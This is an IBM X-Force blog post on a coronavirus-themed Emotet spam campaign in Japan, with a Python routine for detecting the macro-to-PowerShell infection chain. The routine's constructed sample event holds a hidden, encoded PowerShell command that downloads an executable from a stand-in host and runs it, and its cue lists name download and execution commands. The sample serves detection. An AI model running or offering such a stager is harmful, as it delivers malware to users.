IBM X-Force has identified a spam campaign targeting users in Japan that employs the coronavirus scare as a lure to encourage people to open malicious emails. The messages contain Microsoft Office files loaded with macros that, when enabled, launch an infection routine that delivers the Emotet Trojan.

In general, Emotet is very focused on infecting companies in North America and some parts of Europe, but we are seeing it diversify its activity in the past few months. Is Emotet changing its attack turf by spamming in Japan? Emotet has been provisioning access for the TrickBot gang, especially where Ryuk ransomware attacks follow. With TrickBot operating more frequently in Japan, it is no surprise that Emotet is expanding its reach in the region.

Japan is also becoming a more lucrative target for all cybercrime groups ahead of the 2020 Olympic games, which are scheduled to take place in the country’s capital in the summer of 2020.

A Timely Spam Campaign

How did Emotet get to write coherent spam in Japanese? The emails used in the campaign appear to be copies of legitimate, compromised emails concerning the coronavirus outbreak. Some of the email samples that IBM X-Force researchers have captured in our spam traps contain details that would make this spam appear quite legitimate.

Figure 1: Sample emails from spam captured by IBM X-Force research

Machine translation of the text provides the email’s context:

Jurisdiction Tsusho / Facility Related Disability Welfare Service Provider We become indebted to. Patients were reported about the new type of coronavirus-related pneumonia, mainly in Takeshi, China. In Japan, patients are being reported in Osaka Prefecture. Along with the anticipated increase in the number of visitors to Japan, a separate notice has been issued. Therefore, please check the attached notice.

As an example, the following footer on one of the email formats included information from the legitimate website of the Kyoto prefecture:

Kyoto Prefectural Yamashiro Minami Public Health Center welfare room (in charge: Umino) 18-1 Kizu Ueto, Kizugawa City, Kyoto Prefecture 619-0214, Japan Telephone: 0774-72-0979 FAX: 0774-72-8412

Inside the spam, recipients who open the attachment will find a rather standard poisoned Word document that prompts them to enable macros.

Figure 2: Emotet infection launcher concealed in a Word document (Source: IBM X-Force)

The infection flow is also familiar from other recent Emotet infection routines, starting with malicious PowerShell scripts that end up fetching and running executable files. The eventual payload is an Emotet Trojan file:

Figure 3: Emotet infection routine as observed via spam emails in Japan (Source: IBM X-Force)
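As an added example (not part of the X-Force write-up), a small Python triage routine that flags the chain described above in process-creation telemetry: an Office application spawning PowerShell with a hidden window and an encoded command that downloads and runs an executable. The event field names and the sample events are constructed assumptions modelled on Sysmon Event ID 1 fields, not data from the campaign.

```python
import base64
import re
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
DOWNLOAD_CUES = ("downloadfile", "downloadstring", "invoke-webrequest",
                 "net.webclient", "start-bitstransfer")  # fetch from the network
EXEC_CUES = ("start-process", "invoke-item", "invoke-expression")  # run what was fetched

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE) or '' if absent."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  cmdline, re.IGNORECASE)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_event(ev):
    """Return the reasons an event looks like the macro stager chain ([] = benign)."""
    parent = ev["parent_image"].lower().rsplit("\\", 1)[-1]
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    reasons = []
    if parent in OFFICE_PARENTS:
        reasons.append(f"office parent {parent}")
    decoded = decode_encoded_command(ev["command_line"])
    if decoded:
        reasons.append("encoded command")
    text = (ev["command_line"] + " " + decoded).lower()  # inspect both layers
    if re.search(r"-w(?:indowstyle)?\s+hidden", text):
        reasons.append("hidden window")
    for label, cues in (("download cue", DOWNLOAD_CUES), ("execute cue", EXEC_CUES)):
        if any(cue in text for cue in cues):
            reasons.append(label)
    # Alert only when a download cue is corroborated by at least one other signal.
    return reasons if "download cue" in reasons and len(reasons) >= 2 else []

# Constructed sample telemetry (not campaign data): one stager, one benign admin script.
STAGER = ("$w = New-Object Net.WebClient; $w.DownloadFile('http://example.invalid/x.exe',"
          " $env:TEMP + '\\x.exe'); Start-Process ($env:TEMP + '\\x.exe')")
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": PS, "command_line": f"powershell.exe -w hidden -nop -enc {ENCODED}"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell.exe -File C:\scripts\inventory.ps1"},
]
```

Only the first sample event scores; the routine deliberately ignores PowerShell launched from Explorer without a download cue so that routine administration does not trigger it.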

For indicators of compromise (IoCs) from this campaign, check out our X-Force Exchange collection.

Keep Botnet Spam Out of Your Networks

Cybercriminals are fond of riding trending news subjects to spread malspam. The more resilient ones may get through some security controls, which can make keeping sophisticated, self-propagating malware out of enterprise networks a bit of a challenge. Here are some tips that can help security teams reduce the risk of infection via botnet spam:

  • Have an incident response plan that corresponds with a threat like Emotet. Since this malware can usher in a widespread ransomware attack, your teams will have to quickly escalate, contain and remedy it before further damage can take place.
  • Educate users about threats like Emotet and its specific tactics of inserting itself into conversations to lure email recipients into opening attachments.
  • Ensure systems are patched on time.
  • Update endpoint detection and response (EDR) and anti-virus solutions deployed throughout your environment.
  • Segregate networks to limit the reach of self-propagating malware.
  • Review privileged access and privileged users to enforce principles of least privilege.
  • Keep up to date on blacklists of malicious IPs and compromised websites malware uses to spread.
  • Use an email security tool that features attachment inspection and disable the ability to run macros from attachments if your business does not use them frequently.
  • Keep up to date on threat intelligence that can help you stay aware of emerging campaigns and talk to your teams about them.

Advanced malware protection solutions can help mitigate the risk of infection by Emotet and other banking Trojans. If your team requires incident response support, please contact the IBM X-Force Incident Response and Intelligence Services (IRIS) team.

For security incident emergencies, contact us at: US hotline 1-888-241-9812 | Global hotline (+001) 602-220-1440
